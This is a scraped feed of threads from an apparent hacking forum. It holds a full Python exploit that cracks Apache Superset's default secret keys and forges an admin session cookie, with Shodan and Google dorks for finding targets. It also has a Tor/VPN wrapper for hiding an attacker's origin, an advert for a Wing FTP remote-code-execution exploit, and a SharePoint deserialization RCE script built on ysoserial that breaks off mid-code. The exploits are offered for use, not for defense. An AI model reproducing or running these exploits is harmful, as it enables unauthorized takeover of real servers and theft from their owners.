&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Decoded session cookie: {decoded}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Error: Not a Flask session cookie')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;match = re.search(r'"version_string": "(.*?)&amp;#34', resp.text)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if match:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;version = match.group(1)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;version = 'Unknown'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Superset Version: {version}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for i, k in enumerate(SECRET_KEYS):<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cracked = session.verify(session_cookie, k)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if cracked:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if not cracked:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Failed to crack session cookie')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Vulnerable - Using default SECRET_KEY: {k}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user_id = int(args.id)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user_id = args.id<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Forged session cookie for user {user_id}: {forged_cookie}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;u1 = args.url.rstrip('/') + '/superset/welcome'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")<br />
<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;except Exception as e:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Unexpected error: {e}')<br />
<br />
<br />
if __name__ == '__main__':<br />
&nbsp;&nbsp;&nbsp;&nbsp;main()</code></div></div>]]></description>
			<content:encoded><![CDATA[An authentication bypass vulnerability exists due to the use of a default or hardcoded secret key in the application’s configuration. Secret keys are typically used for signing session cookies, JWT tokens, or other authentication mechanisms. If the default key is predictable (e.g., defaultsecret, changeme, or any framework-provided default), an attacker can craft valid authentication tokens or session cookies, effectively bypassing login requirements and gaining unauthorized access to protected areas of the application<br />
<br />
Dork<br />
<div class="codeblock"><div class="body" dir="ltr"><code>Google: intext: "Welcome to Apache Superset"<br />
Shodan: product:"Apache Superset"</code></div></div><br />
Python Code<br />
<div class="codeblock"><div class="body" dir="ltr"><code>from flask_unsign import session<br />
import requests<br />
import urllib3<br />
import argparse<br />
import re<br />
from time import sleep<br />
from selenium import webdriver<br />
from urllib.parse import urlparse<br />
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />
<br />
<br />
SECRET_KEYS = [<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'&#92;x02&#92;x01thisismyscretkey&#92;x01&#92;x02&#92;&#92;e&#92;&#92;y&#92;&#92;y&#92;&#92;h',&nbsp;&nbsp;# version &lt; 1.4.1<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# version &gt;= 1.4.1<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'thisISaSECRET_1234',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# deployment template<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# documentation<br />
&nbsp;&nbsp;&nbsp;&nbsp;b'TEST_NON_DEV_SECRET'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# docker compose<br />
]<br />
<br />
def main():<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser = argparse.ArgumentParser()<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)<br />
&nbsp;&nbsp;&nbsp;&nbsp;parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')<br />
&nbsp;&nbsp;&nbsp;&nbsp;args = parser.parse_args()<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;u = args.url.rstrip('/') + '/login/'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;headers = {<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if resp.status_code != 200:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Error retrieving login page at {u}, status code: {resp.status_code}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;session_cookie = None<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for c in resp.cookies:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if c.name == 'session':<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;session_cookie = c.value<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if not session_cookie:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Error: No session cookie found')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Got session cookie: {session_cookie}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;decoded = session.decode(session_cookie)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Decoded session cookie: {decoded}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Error: Not a Flask session cookie')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;match = re.search(r'"version_string": "(.*?)&amp;#34', resp.text)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if match:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;version = match.group(1)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;version = 'Unknown'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Superset Version: {version}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for i, k in enumerate(SECRET_KEYS):<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cracked = session.verify(session_cookie, k)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if cracked:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if not cracked:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print('Failed to crack session cookie')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Vulnerable - Using default SECRET_KEY: {k}')<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user_id = int(args.id)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user_id = args.id<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Forged session cookie for user {user_id}: {forged_cookie}')<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;u1 = args.url.rstrip('/') + '/superset/welcome'<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")<br />
<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;except Exception as e:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(f'Unexpected error: {e}')<br />
<br />
<br />
if __name__ == '__main__':<br />
&nbsp;&nbsp;&nbsp;&nbsp;main()</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[NVIDIAScape: OCI Hook Inheritance Flaws in AI Infra]]></title>
			<link>https://raidforums.hn/Thread-NVIDIAScape-OCI-Hook-Inheritance-Flaws-in-AI-Infra</link>
			<pubDate>Wed, 30 Jul 2025 20:28:15 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=241035">antisocial</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-NVIDIAScape-OCI-Hook-Inheritance-Flaws-in-AI-Infra</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Taking a look at NVIDIAScape after its Pwn2Own reveal. CDI mode allows env vars like LD_PRELOAD to propagate through OCI hooks, inverting isolation for root execution on the host. More or less under-discussed aspect in shared AI clusters, this opens vectors for model exfiltration or poisoning, especially via tainted Hugging Face images in supply chains. Reminds me of older runc vulnerabilities, but the GPU element part takes it to another level, this vulnerability hitting roughly 37% of cloud AI services. I also found this a bit amateur like, because this is mostly privilege escalation for babies, and this coming from a very trusted company. </div>
<div style="text-align: center;" class="mycode_align">I wont bother writing a exploit since anyone with a brain can figure out how to abuse this.<br />
<br />
Not sure if anyone else will find this interesting, but i did.</div>
<div style="text-align: center;" class="mycode_align">References &amp; Articles:<br />
<a href="https://zeropath.com/blog/nvidiascape-cve-2025-23266-nvidia-container-toolkit-escape" target="_blank" rel="noopener" class="mycode_url">https://zeropath.com/blog/nvidiascape-cv...kit-escape</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-23266" target="_blank" rel="noopener" class="mycode_url">https://nvd.nist.gov/vuln/detail/CVE-2025-23266</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23266" target="_blank" rel="noopener" class="mycode_url">https://cve.mitre.org/cgi-bin/cvename.cg...2025-23266</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://securityonline.info/nvidia-plugs-critical-flaws-in-container-toolkit-and-gpu-operator-cve-2025-23266-cve-2025-23267/" target="_blank" rel="noopener" class="mycode_url">https://securityonline.info/nvidia-plugs...025-23267/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.wiz.io/blog/nvidia-ai-vulnerability-cve-2025-23266-nvidiascape" target="_blank" rel="noopener" class="mycode_url">https://www.wiz.io/blog/nvidia-ai-vulner...vidiascape</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://gbhackers.com/nvidia-container-toolkit-vulnerability/" target="_blank" rel="noopener" class="mycode_url">https://gbhackers.com/nvidia-container-t...erability/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thecyberthrone.in/2025/07/17/nvidia-container-toolkit-vulnerabilities/" target="_blank" rel="noopener" class="mycode_url">https://thecyberthrone.in/2025/07/17/nvi...abilities/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/07/critical-nvidia-container-toolkit-flaw.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/07/critic...-flaw.html</a></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Taking a look at NVIDIAScape after its Pwn2Own reveal. CDI mode allows env vars like LD_PRELOAD to propagate through OCI hooks, inverting isolation for root execution on the host. More or less under-discussed aspect in shared AI clusters, this opens vectors for model exfiltration or poisoning, especially via tainted Hugging Face images in supply chains. Reminds me of older runc vulnerabilities, but the GPU element part takes it to another level, this vulnerability hitting roughly 37% of cloud AI services. I also found this a bit amateur like, because this is mostly privilege escalation for babies, and this coming from a very trusted company. </div>
<div style="text-align: center;" class="mycode_align">I wont bother writing a exploit since anyone with a brain can figure out how to abuse this.<br />
<br />
Not sure if anyone else will find this interesting, but i did.</div>
<div style="text-align: center;" class="mycode_align">References &amp; Articles:<br />
<a href="https://zeropath.com/blog/nvidiascape-cve-2025-23266-nvidia-container-toolkit-escape" target="_blank" rel="noopener" class="mycode_url">https://zeropath.com/blog/nvidiascape-cv...kit-escape</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-23266" target="_blank" rel="noopener" class="mycode_url">https://nvd.nist.gov/vuln/detail/CVE-2025-23266</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23266" target="_blank" rel="noopener" class="mycode_url">https://cve.mitre.org/cgi-bin/cvename.cg...2025-23266</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://securityonline.info/nvidia-plugs-critical-flaws-in-container-toolkit-and-gpu-operator-cve-2025-23266-cve-2025-23267/" target="_blank" rel="noopener" class="mycode_url">https://securityonline.info/nvidia-plugs...025-23267/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.wiz.io/blog/nvidia-ai-vulnerability-cve-2025-23266-nvidiascape" target="_blank" rel="noopener" class="mycode_url">https://www.wiz.io/blog/nvidia-ai-vulner...vidiascape</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://gbhackers.com/nvidia-container-toolkit-vulnerability/" target="_blank" rel="noopener" class="mycode_url">https://gbhackers.com/nvidia-container-t...erability/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thecyberthrone.in/2025/07/17/nvidia-container-toolkit-vulnerabilities/" target="_blank" rel="noopener" class="mycode_url">https://thecyberthrone.in/2025/07/17/nvi...abilities/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/07/critical-nvidia-container-toolkit-flaw.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/07/critic...-flaw.html</a></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit Safety-net PoC]]></title>
			<link>https://raidforums.hn/Thread-Exploit-Safety-net-PoC</link>
			<pubDate>Mon, 28 Jul 2025 21:44:00 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=470431">Inexorable_Baer</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Exploit-Safety-net-PoC</guid>
			<description><![CDATA[Hello forum members,<br />
<br />
PoC By: <dvz_me_placeholder id="0" /><br />
<br />
This is a safety-net I use for my tools and has saved my ass multiple times. For this to work, you need a VPN and Tor. The idea is for the code to check if you have your VPN up and then check if Tor is enabled. I use this to protect myself since I can't afford a VPS. The example payload is just sending a request to Google, but you can use your imagination to send any payloads.<br />
<br />
<br />
<div class="codeblock"><div class="body" dir="ltr"><code>import requests<br />
import json<br />
<br />
<br />
class Safetynet:<br />
   def __init__(self):<br />
      self.homeIP = ""# enter your home IP here<br />
      self.VPNIP = ""<br />
      self.TorIP = ""<br />
      self.tor = requests.Session()<br />
      self.tor.proxies = {"https":"socks5h://127.0.0.1:9050"}<br />
      self.__setup()<br />
<br />
<br />
   def __setup(self):<br />
      """Check the connection is setup proporly"""<br />
      r = requests.get("https://ip.me").text.strip()<br />
      if r != self.homeIP:<br />
         self.VPNIP = r<br />
      else: raise Exception("VPN not On!")<br />
         r = self.tor.get("https://ip.me").text.strip()<br />
      if r != self.VPNIP:<br />
         self.TorIP = r<br />
      else: raise Exception("Tor not On!")<br />
<br />
   def payload(self, website: str):<br />
      req = self.tor.get(website)<br />
      print(req.text)<br />
<br />
<br />
Exploite = Safetynet()<br />
Exploite.payload("https://www.google.com")</code></div></div>]]></description>
			<content:encoded><![CDATA[Hello forum members,<br />
<br />
PoC By: <dvz_me_placeholder id="0" /><br />
<br />
This is a safety-net I use for my tools and has saved my ass multiple times. For this to work, you need a VPN and Tor. The idea is for the code to check if you have your VPN up and then check if Tor is enabled. I use this to protect myself since I can't afford a VPS. The example payload is just sending a request to Google, but you can use your imagination to send any payloads.<br />
<br />
<br />
<div class="codeblock"><div class="body" dir="ltr"><code>import requests<br />
import json<br />
<br />
<br />
class Safetynet:<br />
   def __init__(self):<br />
      self.homeIP = ""# enter your home IP here<br />
      self.VPNIP = ""<br />
      self.TorIP = ""<br />
      self.tor = requests.Session()<br />
      self.tor.proxies = {"https":"socks5h://127.0.0.1:9050"}<br />
      self.__setup()<br />
<br />
<br />
   def __setup(self):<br />
      """Check the connection is setup proporly"""<br />
      r = requests.get("https://ip.me").text.strip()<br />
      if r != self.homeIP:<br />
         self.VPNIP = r<br />
      else: raise Exception("VPN not On!")<br />
         r = self.tor.get("https://ip.me").text.strip()<br />
      if r != self.VPNIP:<br />
         self.TorIP = r<br />
      else: raise Exception("Tor not On!")<br />
<br />
   def payload(self, website: str):<br />
      req = self.tor.get(website)<br />
      print(req.text)<br />
<br />
<br />
Exploite = Safetynet()<br />
Exploite.payload("https://www.google.com")</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)]]></title>
			<link>https://raidforums.hn/Thread-CVE-2025-47812-Wing-FTP-Server-Remote-Code-Execution-RCE</link>
			<pubDate>Mon, 28 Jul 2025 14:54:02 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=367473">thermos</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-CVE-2025-47812-Wing-FTP-Server-Remote-Code-Execution-RCE</guid>
			<description><![CDATA[This vulnerability originates from Wing FTP Server's improper handling of NULL bytes within the username parameter during the authentication process. This allows attackers to inject Lua code directly into session files. These malicious session files are then executed when a valid session is loaded, leading to arbitrary command execution on the server.<br />
<br />
Key features of this exploit include:<br />
<br />
Remote Code Execution: Execute any command you choose on the target server.<br />
Root/SYSTEM Privileges: Often achieves RCE with the highest system privileges due to the default configurations of Wing FTP Server.<br />
Anonymous Access Exploitation: Can be leveraged even if only anonymous logins are permitted on the server.<br />
Batch Scanning: Scan multiple targets by providing a list of URLs from a file.<br />
Custom Command Execution: Specify and run any command you need on the vulnerable server.<br />
<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[This vulnerability originates from Wing FTP Server's improper handling of NULL bytes within the username parameter during the authentication process. This allows attackers to inject Lua code directly into session files. These malicious session files are then executed when a valid session is loaded, leading to arbitrary command execution on the server.<br />
<br />
Key features of this exploit include:<br />
<br />
Remote Code Execution: Execute any command you choose on the target server.<br />
Root/SYSTEM Privileges: Often achieves RCE with the highest system privileges due to the default configurations of Wing FTP Server.<br />
Anonymous Access Exploitation: Can be leveraged even if only anonymous logins are permitted on the server.<br />
Batch Scanning: Scan multiple targets by providing a list of URLs from a file.<br />
Custom Command Execution: Specify and run any command you need on the vulnerable server.<br />
<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CVE-2025-53770 - Microsoft Sharepoint Unauthenticated RCE]]></title>
			<link>https://raidforums.hn/Thread-CVE-2025-53770-Microsoft-Sharepoint-Unauthenticated-RCE</link>
			<pubDate>Sun, 27 Jul 2025 17:39:45 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=241035">antisocial</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-CVE-2025-53770-Microsoft-Sharepoint-Unauthenticated-RCE</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Shodan</span></span> query: "MicrosoftSharePointTeamServices port:"80,443" http.component:"Microsoft SharePoint" "</div>
<div style="text-align: center;" class="mycode_align">Description:</div>
<div style="text-align: center;" class="mycode_align">Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.</div>
<div style="text-align: center;" class="mycode_align"><span style="text-decoration: underline;" class="mycode_u">References:</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.forbes.com/sites/daveywinder/2025/07/20/microsoft-confirms-ongoing-mass-sharepoint-attack---no-patch-available/" target="_blank" rel="noopener" class="mycode_url">https://www.forbes.com/sites/daveywinder...available/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/" target="_blank" rel="noopener" class="mycode_url">https://msrc.microsoft.com/blog/2025/07/...025-53770/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.darkreading.com/remote-workforce/microsoft-rushes-emergency-fix-exploited-sharepoint-toolshell-flaw" target="_blank" rel="noopener" class="mycode_url">https://www.darkreading.com/remote-workf...shell-flaw</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.cisa.gov/news-events/alerts/2025/07/20/microsoft-releases-guidance-exploitation-sharepoint-vulnerability-cve-2025-53770" target="_blank" rel="noopener" class="mycode_url">https://www.cisa.gov/news-events/alerts/...2025-53770</a><br />
<br />
<div class="codeblock"><div class="body" dir="ltr"><code>#!/usr/bin/env python3<br />
import requests<br />
import sys<br />
import subprocess<br />
import gzip<br />
import urllib3<br />
import base64<br />
from urllib.parse import urlparse, urlencode<br />
<br />
urllib3.disable_warnings()<br />
JAR="ysoserial-all.jar"<br />
GADGET="CommonsCollections6"<br />
<br />
def generate_payload(cmd):<br />
    escaped=cmd.replace('"','&#92;&#92;"')<br />
    data=subprocess.check_output(["java","-jar",JAR,GADGET,f'cmd.exe /c {escaped}'])<br />
    comp=gzip.compress(data)<br />
    return base64.b64encode(comp).decode()<br />
<br />
def main():<br />
    if len(sys.argv)!=3:<br />
        print("Usage: exploit.py &lt;target&gt; &lt;command&gt;")<br />
        sys.exit(1)<br />
    target,cmd=sys.argv[1],sys.argv[2]<br />
    print(f"<br />
[*]Generating payload for: {cmd}")<br />
    payload=generate_payload(cmd)<br />
    print("<br />
[*]Sending exploit")<br />
    ok,code=send_exploit(target,payload)<br />
    if ok:<br />
        print(f"[+] Exploit sent to {target}")<br />
